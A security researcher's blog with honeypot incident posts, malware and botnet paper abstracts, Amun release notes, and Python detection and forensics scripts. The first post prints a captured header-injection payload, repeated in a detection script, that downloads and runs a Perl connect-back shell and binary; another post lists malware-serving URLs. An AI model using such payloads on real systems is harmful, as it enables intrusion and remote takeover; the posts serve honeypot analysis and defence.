Virus Blog

Remote Command Execution

— Posted by zeroq @ 10:17 - 21 Jun, 2010

I just noticed the following exploit hitting our Amun honeypot installation:

 xxx.xxx.181.165 -> xxx.xxx.153.105:80 (HTTP Vulnerability: http://xxx.xxx.120.69:80/cb.txt) (Shellcode: plainurl)

The cb.txt file is a Perl connect-back shell: once executed it opens a TCP connection to the attacker's host and port and attaches a shell to it. The attack relies on remote command execution (RCE) on the web server to make the victim download and run that script. Note that the payload is PHP code in a <? ... ?> short tag placed in the User-Agent header; it does nothing on a server that merely logs the header, and only fires where the header value ends up in something the server later evaluates as PHP. The attack request looks as follows:

GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: <?system('cd /var/tmp;wget http://xxx.xxx.120.69/cb.txt;perl cb.txt xxx.xxx.5.30 80;wget http://xxx.xxx.120.69/cback;chmod +x cback;./cback xxx.xxx.5.30 80;cd /dev/shm;curl -O http://xxx.xxx.120.69/cb.txt;perl cb.txt xxx.xxx.5.30 80;curl -O http://xxx.xxx.120.69/cback;chmod +x cback;./cback xxx.xxx.5.30 80');?> ;
[...]

The injected command tries several fallbacks for the same goal: wget and curl as downloaders, /var/tmp and /dev/shm as writable working directories, and both the Perl script and a separate cback executable as the connect-back shell, all pointed at the same host and port. I will try to investigate this incident further as soon as I have more time, but I guess the next Amun release needs a Linux shell emulation module =)
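As an added example (not Amun's code and not part of the original post), here is how a honeypot could flag this kind of request and pull out what matters for follow-up: the PHP tag in the header, the exec function it calls, the download URLs and their hosts, and the connect-back host and port. The request it runs on is constructed to mirror the captured one, with RFC 5737 test addresses in place of the redacted ones.

```python
"""Spot PHP code injected into HTTP request headers and pull the download URLs and
connect-back targets out of the embedded shell command.
Added example for this post; it is not Amun's code. The request below is constructed:
the addresses use RFC 5737 test ranges instead of the redacted ones from the capture."""
import re
from urllib.parse import urlparse

# A PHP open tag (short or long form) anywhere in a header value is the injection marker.
PHP_TAG = re.compile(r"<\?(?:php)?\s*(?P<body>.*?)\?>", re.S)
# Command-execution calls with a quoted string argument, e.g. system('...').
PHP_EXEC = re.compile(
    r"\b(?P<func>system|exec|shell_exec|passthru|popen)\s*\(\s*(?P<q>['\"])(?P<cmd>.*?)(?P=q)", re.S)
URL = re.compile(r"https?://[^\s'\";]+")
# "perl cb.txt HOST PORT" or "./cback HOST PORT": the pair after the script is the connect-back target.
CALLBACK = re.compile(r"(?:perl\s+\S+|\./\S+)\s+(?P<host>[\w.-]+)\s+(?P<port>\d{1,5})")


def parse_request(raw):
    """Split a raw HTTP request into (request_line, {lower-cased header: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def analyze(raw):
    """Return one finding per PHP tag found in any header: which header, which exec
    function (None if the tag carries no recognised call), the URLs it downloads,
    the hosts serving them and the (host, port) pairs the shell connects back to."""
    findings = []
    _, headers = parse_request(raw)
    for name, value in headers.items():
        for tag in PHP_TAG.finditer(value):
            calls = list(PHP_EXEC.finditer(tag.group("body")))
            if not calls:
                findings.append({"header": name, "function": None, "urls": [], "hosts": [], "callbacks": []})
            for call in calls:
                cmd = call.group("cmd")
                urls = sorted(set(URL.findall(cmd)))
                findings.append({
                    "header": name,
                    "function": call.group("func"),
                    "urls": urls,
                    "hosts": sorted({urlparse(u).hostname for u in urls}),
                    "callbacks": sorted({(m.group("host"), int(m.group("port"))) for m in CALLBACK.finditer(cmd)}),
                })
    return findings


# Constructed request modelled on the captured one (same command structure, test addresses).
SAMPLE_REQUEST = (
    "GET HTTP/1.1 HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "User-Agent: <?system('cd /var/tmp;wget http://192.0.2.10/cb.txt;perl cb.txt 192.0.2.30 80;"
    "wget http://192.0.2.10/cback;chmod +x cback;./cback 192.0.2.30 80;cd /dev/shm;"
    "curl -O http://192.0.2.10/cb.txt;perl cb.txt 192.0.2.30 80;curl -O http://192.0.2.10/cback;"
    "chmod +x cback;./cback 192.0.2.30 80');?> ;\r\n"
    "Host: 192.0.2.5\r\n\r\n"
)
BENIGN_REQUEST = "GET / HTTP/1.1\r\nHost: 192.0.2.5\r\nUser-Agent: Mozilla/5.0\r\n\r\n"

if __name__ == "__main__":
    for finding in analyze(SAMPLE_REQUEST):
        print(finding)
```

This only reads the request. Whether the PHP actually executes is a property of the target, which is exactly why a honeypot never needs to run it: it can fake the result and go straight to fetching the extracted URLs.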



Blacklisting Malicious Websites using Peer-to-Peer Technology

— Posted by zeroq @ 17:17 - 17 Jun, 2010
In March 2010 we published a technical report about a distributed blacklisting service for malicious websites that uses Peer-to-Peer technology. It is currently purely theoretical, so there is no working implementation yet. The PDF document is available here.

Abstract:
The misuse of websites to serve exploit code that compromises hosts on the Internet has increased drastically in recent years. With methods like Fast-Flux or Domain-Flux, attackers have found ways to generate thousands of links leading to malicious web servers in a very short time. With the distributed blacklist solution we propose in this paper we are able to respond quickly to new threats and to involve different sources in collecting information about malicious websites. It is therefore possible to protect networks from threats that have not even targeted them yet, by sharing attack information globally.


A Short Visit To Worm Palevo

— Posted by zeroq @ 17:22 - 03 Apr, 2010

I decided to continue my "a short visit to" series with a brief analysis of the worm Palevo. Don't expect too much; it is just a summary of findings I came across. The PDF file is here.

Abstract:
This paper describes a short manual analysis of the worm Palevo. We show how we first noticed the worm at our honeypot installation and describe its currently broken propagation mechanism, which exploits the MS08-067 vulnerability. We then briefly discuss Palevo's general features, analyse the botnet channel, and describe the propagation mechanisms that are used. To conform with the majority of anti-virus vendors regarding the naming of the malware, we use Palevo as the name throughout the paper. Note that Palevo is also often called Pushbot by some anti-virus vendors.



Amun: WINS Reloaded

— Posted by zeroq @ 16:12 - 25 Mar, 2010

The current SVN version of Amun already contains a fixed version of the WINS (MS04-045) vulnerability emulation module. I added a few more stages and modified the packet replies to look like actual Windows 2000 Advanced Server replies, instead of just answering with a vulnerable Windows version string as before. The emulated vulnerability can now also be exploited with the current Metasploit Framework.

The first attacker that successfully exploited the emulated vulnerability is shown below. Interestingly, this attacker also exploits vulnerabilities in the DCOM (MS03-026) module, the LSASS (MS04-011) module and the HTTP (MS03-051 FrontPage exploit) module.
 
exploit 83.18.xxx.xxx:43076 -> xxx.xxx.xxx.37:445
(LSASS Vulnerability: http://xxx.xxx.xxx.xxx:19005/lsd)

exploit 83.18.xxx.xxx:43873 -> xxx.xxx.xxx.37:80
(HTTP Vulnerability: http://xxx.xxx.xxx.xxx:19005/lsd)

exploit 83.18.xxx.xxx:44995 -> xxx.xxx.xxx.37:42
(WINS Vulnerability: http://xxx.xxx.xxx.xxx:19005/lsd)

Unfortunately the shellcode contains a local (non-routable) IP address as the download host, so the attacking machine is apparently behind a NAT and the download URL is not reachable from the honeypot.
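As an added example, not Amun's own log handling, the following script parses exploit log records in the two formats shown on this blog, groups them by attacking host so that multi-vector attackers like the one above stand out, and classifies each download URL by whether its host sits in an RFC 1918, loopback or link-local block, which is the NAT symptom seen here. The log lines are constructed with RFC 5737 test addresses.

```python
"""Parse Amun-style exploit log lines, group them by attacking host and check whether the
download URL in each payload points at a routable address. Added example for this post; it
is not Amun's own log parser. The log below is constructed from the line formats shown in
this post and in the Remote Command Execution post, with RFC 5737 test addresses."""
import ipaddress
import re
from collections import defaultdict
from urllib.parse import urlparse

# Both formats seen on this blog: "exploit SRC:SPORT -> DST:DPORT (VULN Vulnerability: URL)"
# and "SRC -> DST:DPORT (VULN Vulnerability: URL) (Shellcode: NAME)".
LINE = re.compile(
    r"^(?:exploit\s+)?(?P<src>[\d.]+)(?::(?P<sport>\d+))?\s*->\s*(?P<dst>[\d.]+):(?P<dport>\d+)\s*"
    r"\((?P<vuln>\w+) Vulnerability: (?P<url>\S+?)\)(?:\s*\(Shellcode: (?P<shellcode>\w+)\))?"
)
# Address blocks a honeypot on the public Internet cannot fetch from: RFC 1918, loopback,
# link-local and "this network". Listed explicitly because ipaddress.is_private also flags
# the RFC 5737 documentation ranges used in the sample.
NON_ROUTABLE = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16", "0.0.0.0/8")]


def parse_events(text):
    """One dict per record. The WINS post's lines wrap the '(... Vulnerability: ...)' part onto
    the next line, so a line starting with '(' is first re-joined to the line before it."""
    joined = re.sub(r"\n\s*\(", " (", text)
    events = []
    for line in joined.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        e = m.groupdict()
        e["sport"] = int(e["sport"]) if e["sport"] else None
        e["dport"] = int(e["dport"])
        events.append(e)
    return events


def url_reachability(url):
    """'private' if the download host is an IP in a non-routable block (shellcode built behind
    NAT, as in this post), 'public' for any other IP literal, 'unknown' for a hostname."""
    host = urlparse(url).hostname
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "unknown"
    return "private" if any(ip in net for net in NON_ROUTABLE) else "public"


def summarize(text):
    """Per attacking host: emulated services hit, target ports, and each payload URL with its
    reachability; multi_vector marks hosts that exploited more than one emulated vulnerability."""
    per_src = defaultdict(lambda: {"vulns": set(), "ports": set(), "urls": {}})
    for e in parse_events(text):
        entry = per_src[e["src"]]
        entry["vulns"].add(e["vuln"])
        entry["ports"].add(e["dport"])
        entry["urls"][e["url"]] = url_reachability(e["url"])
    return {
        src: {"vulns": sorted(v["vulns"]), "ports": sorted(v["ports"]),
              "urls": v["urls"], "multi_vector": len(v["vulns"]) > 1}
        for src, v in per_src.items()
    }


# Constructed log: one host hitting LSASS, HTTP and WINS with a payload URL on a 10/8 address,
# and a second host whose payload URL is routable.
SAMPLE_LOG = """\
exploit 198.51.100.7:43076 -> 203.0.113.37:445
(LSASS Vulnerability: http://10.0.0.5:19005/lsd)
exploit 198.51.100.7:43873 -> 203.0.113.37:80
(HTTP Vulnerability: http://10.0.0.5:19005/lsd)
exploit 198.51.100.7:44995 -> 203.0.113.37:42
(WINS Vulnerability: http://10.0.0.5:19005/lsd)
198.51.100.20 -> 203.0.113.37:80 (HTTP Vulnerability: http://192.0.2.10:80/cb.txt) (Shellcode: plainurl)
"""

if __name__ == "__main__":
    for src, info in summarize(SAMPLE_LOG).items():
        print(src, info)
```

A "private" URL is not worthless: the attacker's real address is the log's source IP, and the path and port in the URL still tell you which dropper family the shellcode belongs to, even though the download itself will fail.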



CWSandbox.org -> MWAnalysis.org

— Posted by zeroq @ 11:16 - 23 Mar, 2010

For those of you that have not noticed yet, we moved the public interface for CWSandbox.org to MWAnalysis.org.
Please update your links of automated submission scripts to point at the new URL. The latest version of Amun already includes this update.

Next to the analysis report of CWSandbox, we also provide VirusTotal results and a packer detection based on the signatures of PEiD. We also provide an image to quickly determine the main features of submitted malware, as shown below.




Amun v0.1.9

— Posted by zeroq @ 22:12 - 04 Mar, 2010

After some bug fixes I decided that it is time for another file release, to keep up with the SVN version.
The tar archive can be downloaded from sourceforge as usual.

Changes in v0.1.9:

        - fixed wrong variable name in shellcode manager
        - fixed ftp_download core to allow login without password
        - modified plain ftp command shellcode detection
        - modified shellcode managers multiple file handling
        - modified furth shellcode decoder
        - modified ftp_nat_ip config parameter to accept dns names as well
        - modified match_plainFTP shellcode detector to accept decoded shellcode
        - modified vuln-ms08067 vulnerability
        - modified amun_smb_core
        - modified vuln-maxdb to ignore BitTorrent protocol requests
        - modified vuln-lsass to partly use amun_smb



Amun - Technical Report

— Posted by zeroq @ 19:41 - 14 Jan, 2010

I finally managed to finish my technical report on the Amun honeypot. I have tried to document all aspects of the software so that others can understand it; maybe it is now easier for others to contribute new modules. The PDF document is available here.

 

Abstract:
In this report we describe a low-interaction honeypot named Amun, which is capable of capturing autonomously spreading malware from the Internet. For this purpose, the software emulates a wide range of different vulnerabilities. As soon as an attacker exploits one of the emulated vulnerabilities, the payload transmitted by the attacker is analysed and any download URL found in it is extracted. Next, the honeypot tries to download the malicious software and store it on the local hard disk for further analysis. As a result, we are able to collect, in the best case, previously unknown binaries of malware that spreads automatically across the network. The collected samples can, for example, be used to help anti-virus vendors improve their signatures.



CaptureHPC - detecting malicious websites

— Posted by zeroq @ 23:18 - 10 Dec, 2009
We are currently experimenting with the honeyclient solution CaptureHPC. We have written our own scheduler and client handler in Python and only use the Capture client application to monitor changes on the host. We still have some instability, but things are getting better. We hope to release our code soon.

Our current setup consists of 3 CaptureHPC clients running in parallel. Our URL database is filled by extracting URLs from Google search results for keywords retrieved from Google Trends.
We have detected the following URLs to be malicious during the last days (visit at your own risk):
 
www.icelebz.com/ celebs/ gisele_bundchen/ videos/
MD5: f4de2c9f6e6b3ff2e6d2fcd77b9e41ee - Mal/FakeAV-BP
www.experiencefestival.com/ forum/ news-vitamins/ 263373-vitamin-d-benefits-wwlp-22news.html 
MD5: 676399393b565ab1d4808600e337364a - TR/Dropper.Gen
www.gamesurge.com/ strategies/ Gameboy/ Walkthroughs-P/ Pokemon%20Missingno.shtml 
MD5: 0f0d609ddad379a65f7ad08323446ddf - Trojan-Spy.Win32.Zbot.gen
www.submitrightnow.com/ mindy_lawton_tiger_woods
MD5: ab92cc8f7abeafffc9b588eda2f968cd - Trojan.Win32.Bredolab.Gen.1
izediotia.info/ cgi-bin/ ae 
MD5: 7231cf09b088a8fc4375aed27638f1d9 - Trojan:Win32/Alureon.DA
 
These URLs were all detected within the last four days. The scary thing is the low detection rate of current antivirus software. 


Monitoring the Waledac Botnet

— Posted by zeroq @ 22:53 - 12 Nov, 2009

We have just presented our work on monitoring the Waledac botnet at the European Conference on Computer Network Defense (EC2ND). The main focus of the paper is to get a deeper look inside the botnet, which is considered the successor of the Storm Worm botnet. By analysing the communication infrastructure we managed to construct a fake Waledac instance, called Walowdac, to infiltrate the botnet and collect interesting information. The following image shows the number of bots counted during a single day in August 2009. More information about the approach is presented in the paper.


Abstract:
A botnet is a network of compromised machines under the control of an attacker. Botnets are the driving force behind several misuses on the Internet, for example spam mails or automated identity theft. In this paper, we study the most prevalent peer-to-peer botnet in 2009: Waledac. We present our infiltration of the Waledac botnet, which can be seen as the successor of the Storm Worm botnet. To achieve this we implemented a clone of the Waledac bot named Walowdac. It implements the communication features of Waledac but does not cause any harm, i.e., no spam emails are sent and no other commands are executed. With the help of this tool we observed a minimum daily population of 55,000 Waledac bots and a total of roughly 390,000 infected machines throughout the world. Furthermore, we gathered internal information about the success rates of spam campaigns and newly introduced features like the theft of credentials from victim machines.

This work is a collaboration with Ben Stock, Markus Engelberth, Felix Freiling, and Thorsten Holz.



Network Forensics Puzzle Contest

— Posted by zeroq @ 10:14 - 25 Aug, 2009

I came across a posting on the blog of the Internet Storm Center about a little forensics contest. Although the puzzle is not very hard, it is fun to investigate. If you are willing to send in your solution, there is also a prize to win. Winners are to be announced at Sec558 Network Forensics in San Diego, 9/16-9/18.

All you have to do is analyse a pcap file containing valuable information and answer the following questions:

  1. What is the name of Ann's IM buddy?
  2. What was the first comment in the captured IM conversation?
  3. What is the name of the file Ann transferred?
  4. What is the magic number of the file you want to extract (first four bytes)?
  5. What was the MD5sum of the file?
  6. What is the secret recipe?

I won't give away any solutions here, but I will tell you which tools I used to analyse the pcap file. The number one tool when it comes to pcap is, in my opinion, still tcpdump. It gives you a quick overview of what happened; use filter expressions to narrow the traffic down and -A or -X to dump the complete packet content.
This will help you answer the first few questions. You can also use Wireshark. Another nice tool I came across while investigating the file is tcpxtract, which extracts files out of a pcap file. With its help you are able to extract the file that was transferred, and a bunch of other files =)

To further investigate the instant messenger session I used AimSniff. This tool extracts all kinds of instant messenger information from a given pcap. In this case it did not reveal anything that had not already been discovered using tcpdump, but it substantiated the earlier findings.

Another nice tool I used was Chaosreader. This tool generates a nice overview of who is communicating with whom and which protocols are used. It extracts sessions and creates some small statistics.

Have fun with the challenge.
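For those who want to do the extraction without installing anything, here is an added example (mine, not a contest tool and not from the original post) that does in pure Python what tcpdump, tcpxtract and md5sum cover above: walk the pcap, reassemble the TCP stream in sequence order, carve the transferred file by its header and footer signature, and hash it. The capture and the PNG-shaped file inside it are constructed so that it runs offline; they are not the contest's data.

```python
"""Reassemble a TCP stream from a pcap and carve the transferred file by its magic number,
then MD5 it: the same steps tcpdump, tcpxtract and md5sum cover in the post, in pure Python.
Added example for this post, not a tool from the contest or the original page. The capture is
constructed in memory (pcap with Ethernet/IPv4/TCP frames) so it runs offline, and the 'PNG'
inside it is a constructed stand-in, not the contest's file."""
import hashlib
import struct

# header/footer pairs for carving, as tcpxtract-style tools use; PNG is enough for the demo
SIGNATURES = {"png": (b"\x89PNG\r\n\x1a\n", b"IEND\xaeB`\x82")}

# constructed stand-in for the transferred file: PNG magic, filler, an IEND footer
SAMPLE_PNG = SIGNATURES["png"][0] + b"\x00" * 40 + b"constructed-image-data" + b"\x00\x00\x00\x00" + SIGNATURES["png"][1]


def md5_hex(data):
    return hashlib.md5(data).hexdigest()


def build_pcap(segments, src=b"\x0a\x00\x00\x01", dst=b"\x0a\x00\x00\x02", sport=5190, dport=1234):
    """Write a little-endian pcap with one TCP segment per (seq, payload) pair, in the order given."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # link type 1 = Ethernet
    for seq, payload in segments:
        tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 8192, 0, 0) + payload
        ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0, src, dst) + tcp
        frame = b"\x00" * 12 + b"\x08\x00" + ip  # zeroed MACs, EtherType IPv4
        out += struct.pack("<IIII", 0, 0, len(frame), len(frame)) + frame
    return out


def tcp_segments(pcap):
    """Yield (flow, seq, payload) for each IPv4/TCP segment in a little-endian Ethernet pcap."""
    magic, _, _, _, _, _, linktype = struct.unpack("<IHHiIII", pcap[:24])
    if magic != 0xA1B2C3D4 or linktype != 1:
        raise ValueError("expected a little-endian pcap with Ethernet link type")
    off = 24
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack("<IIII", pcap[off:off + 16])
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if frame[12:14] != b"\x08\x00":
            continue  # not IPv4
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        total_len = struct.unpack("!H", ip[2:4])[0]
        if ip[9] != 6:
            continue  # not TCP
        tcp = ip[ihl:total_len]
        sport, dport, seq = struct.unpack("!HHI", tcp[:8])
        data_off = (tcp[12] >> 4) * 4
        yield (ip[12:16], sport, ip[16:20], dport), seq, tcp[data_off:]


def reassemble(pcap):
    """Concatenate each flow's payloads in sequence-number order, so an out-of-order capture
    does not break the carved file. Returns {flow: bytes}."""
    flows = {}
    for flow, seq, data in tcp_segments(pcap):
        if data:
            flows.setdefault(flow, []).append((seq, data))
    return {flow: b"".join(d for _, d in sorted(segs)) for flow, segs in flows.items()}


def carve(stream):
    """Return [(kind, first_four_bytes, md5)] for every header..footer file in a byte stream."""
    found = []
    for kind, (header, footer) in SIGNATURES.items():
        start = stream.find(header)
        while start != -1:
            end = stream.find(footer, start + len(header))
            if end == -1:
                break
            blob = stream[start:end + len(footer)]
            found.append((kind, blob[:4], md5_hex(blob)))
            start = stream.find(header, end + len(footer))
    return found


def carve_pcap(pcap):
    return [f for stream in reassemble(pcap).values() for f in carve(stream)]


# constructed capture: an IM-style line, then the file split over three segments that were
# captured out of order, so carving only gives the right hash after reassembly
CHAT = b"user1: sending the file now\r\n"
PART1, PART2, PART3 = SAMPLE_PNG[:30], SAMPLE_PNG[30:60], SAMPLE_PNG[60:]
FILE_SEQ = 1000 + len(CHAT)
SAMPLE_PCAP = build_pcap([
    (1000, CHAT),
    (FILE_SEQ + len(PART1), PART2),  # arrives before PART1
    (FILE_SEQ, PART1),
    (FILE_SEQ + len(PART1) + len(PART2), PART3),
])

if __name__ == "__main__":
    for kind, magic, digest in carve_pcap(SAMPLE_PCAP):
        print(f"{kind}: magic={magic!r} md5={digest}")
```

The out-of-order segments are the point: carving straight from packet order gives a different hash than the sender's file, which is why question 5 in the contest needs a reassembled stream rather than a raw dump.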


